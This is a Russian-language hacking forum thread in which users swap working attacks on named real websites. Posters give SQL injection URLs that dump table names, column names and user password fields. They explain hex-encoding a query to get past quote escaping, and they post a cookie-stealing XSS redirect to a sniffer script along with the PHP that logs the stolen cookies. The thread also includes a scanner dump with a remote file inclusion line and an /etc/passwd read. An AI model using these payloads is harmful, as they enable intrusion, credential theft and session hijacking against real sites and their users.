jecka3000 почитай статьи, любые http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x726F636974-- wildshaman я же писал про набивание постов , а ты сказал, что ничего такого не будет.
Лично я не набиваю, (я не стремлюсь ни в РОА, ни в МОА, ни выше) а просто помогаю человеку. Теперь любая помощь в тематических разделах считается набиванием постов?
PHP: fwrite(fopen('query.txt','a+'),$_REQUEST['QUERY_STRING']."\r\n") Запись квери_стринг. Редирект примерно такой Code: <script>location="http://site.ru/snifffer.php?"+document.cookie</script>
jokester, я достиг такого же результаты с помощью LIMIT 28,1 -- Именн тут база мне ответила user зато на такой запрос http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=%27user%27 жу ничего не выводит...
jecka3000 Я- же написал, почитай любую статью. mailbrush тебе написал, включены маджики, тоеть кавычки экранируются. Переводи в хекс http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572 Дружище, не нужно переиначивать. Сообщения не по теме - это набивание постов, а попросту оффтоп. Применительно к данному случаю: Человек делает выборку из конкретной базы, а ты ему даёшь запрос выборки из всех баз. Он и без тебя , думаю , с этим справлялся. Отсюда вывод: совет не в тему , стало-быть оффтоп.
Code: http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572 Юзай хекс, читай статьи. Тебе же линк дали!
Кто нибудь покажите где здесь уязвимость? Найдено: /?PageServices Найдено: /?wp-cs-dump Найдено: /?wp-html-rend Найдено: /?wp-stop-ver Найдено: /?wp-uncheckout Найдено: /?wp-usr-prop Найдено: /?wp-ver-diff Найдено: /?wp-verify-link Найдено: /?wp-ver-info Найдено: /index.php?IDAdmin=test Найдено: /index.php?base=test Найдено: /index.php?SqlQuery=test Найдено: index.php?tampon=test Найдено: /index.php?name=Members_List&letter=All&sortby=pass Найдено: /index.php?name=Members_List&letter=All&sortby=uid Найдено: /server-status/ Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=?&ratinghost_name=?&rating=99999999999999999999999 Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9 Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id Найдено: /index.php?method=` Найдено: /index.php?a=lostpw&set=1&id=` Найдено: index.php?a=lostpw&set=1&session_id=` Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key= Найдено: /index.php?method=` Найдено: /index.php?a=lostpw&set=1&id=` Найдено: /index.php?a=lostpw&set=1&session_id=` Найдено: /?page=' Найдено: /?page=shop/cart&func=cartAdd&product_id=' Найдено: /?page=shop/browse&category_id=&offset=' Найдено: /?page=admin/index&GulfTech="> Найдено: /index.php?option=content&task=view&id=' i vot eshe /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Да пожайлуста ka4ni.ру Скажи и мне что там мона сделать особенно вот с этим /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).
http://www.alertsite.com/phplive/image.php?l=image.php Так работает/будет работать или нет/не будет работать ? Ответа я так и не получил.Мне только выводит is_dir() функцию,как ты и писал.
Заурядная скуля http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((select+user_password+from+users+limit+0,1),1,1))>1,1,0) Рядом есть с выводом http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users+limit+0,1--+ Валемир, я думаю что нет
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают. Вы еще скажите мне на запросе Code: 1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt> вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?
ты не прав, XSS выполняется у тебя в браузере, а sql запросы идут к базе данных. Можно внутри sql инъекции заюзать xss, но не наоборот.